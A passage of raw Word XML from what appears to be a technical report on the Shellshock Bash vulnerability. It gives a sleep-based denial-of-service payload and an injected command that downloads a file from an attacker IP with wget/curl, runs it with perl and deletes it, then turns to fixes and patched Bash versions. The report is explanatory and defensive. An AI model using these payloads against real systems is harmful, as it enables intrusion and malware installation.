      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>() { :;}; /bin/sleep 20|/sbin/sleep 20|/usr/bin/sleep 20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Here the attacker uses three different sleep commands to increase the probability of successful attack as server configurations are various. A vulnerable target that executes the command will sleep for 20 se</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>onds and do nothing else. Thus, a Denial of Service is achieved as this thread or process on the server will</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 xml:space="preserve">not respond to legitimate requests. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Fourthly and more seriously, Shellshock could be exploited to directly take control of target ser</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ers. As the demonstration of the ability</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to make vulnerable machines download files from attacker co</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>trolled servers, the attacker could definitely set up malware such as Trojans, rootkits as the downloading source files. Check this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{ :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;}; /bin/bash -c \"cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tmp;wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://213.x.x.x/ji;curl -O /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ji</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://213.x.x.x/ji ; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>perl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ji;rm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ji</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>In this example, several lines of Bash commands are injected and executed using the Shellshock vulne</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ability, which are designed to download a malware, execute it and clean it up after successful execution. Since the software environment on the target machine is unknown, the author used both </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>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and </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">command in case one of them is not installed. After this attack, the target system now is under the control of the attacker through the malware just installed. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>6. Recommended solutions of fixation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>With the potential</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 xml:space="preserve">damaging ability of Shellshock in mind, every system administrator and even common user who </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> using systems with possible influence should test the vulnerability immediately. If affected, there are several measures to be taken to eliminate the weakness. The first recommendation is to update Bash to a latest, invulnerable version. A more drastic measure is to switch the default shell from Bash to other </w:t>
      </w:r>
      <w:r w:rsidR="00316A35">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerable alternatives, such as dash or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00154171">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E104C">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Means to update </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001E104C">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bash</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001E104C">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in major distributions of Linux.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal1"/>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63B2DE"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1809"/>
        <w:gridCol w:w="4407"/>
        <w:gridCol w:w="3139"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F636E9" w:rsidRPr="00295AD1">
        <w:trPr>
          <w:trHeight w:val="254"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1809"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F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle3"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4406"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F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle3"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>Available invulnerable version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3138" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="63B2DE"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle3"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>update command example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F636E9" w:rsidRPr="00295AD1">
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="970"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1809" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6"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r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>RHEL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4406" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6"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RHSA-2014:1306-1 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005063E2" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t xml:space="preserve">BASH-3.2-33.el5_11.4 (RHEL5) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t xml:space="preserve">BASH-4.1.2-15.el6_5.2 (RHEL6) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>BASH-4.2.45-5.el7_0.4 (RHEL7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3138" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6"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yum update bash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F636E9" w:rsidRPr="00295AD1">
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="72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r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>CentOS</w:t>
            </w:r>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BASH-3.2-33.el5_10.4 (CentOS 5) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EB2815" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t xml:space="preserve">BASH-4.1.2-15.el6_5.2 (CentOS 6) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>BASH-4.2.45-5.el7_0.4 (CentOS 7)</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yum update bash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F636E9" w:rsidRPr="00295AD1">
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="72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r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>Fedora</w:t>
            </w:r>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EB2815" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t xml:space="preserve">BASH-4.2.48-2.fc19 (Fedora 19) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EB2815" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t xml:space="preserve">BASH-4.2.48-2.fc20 (Fedora 20) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
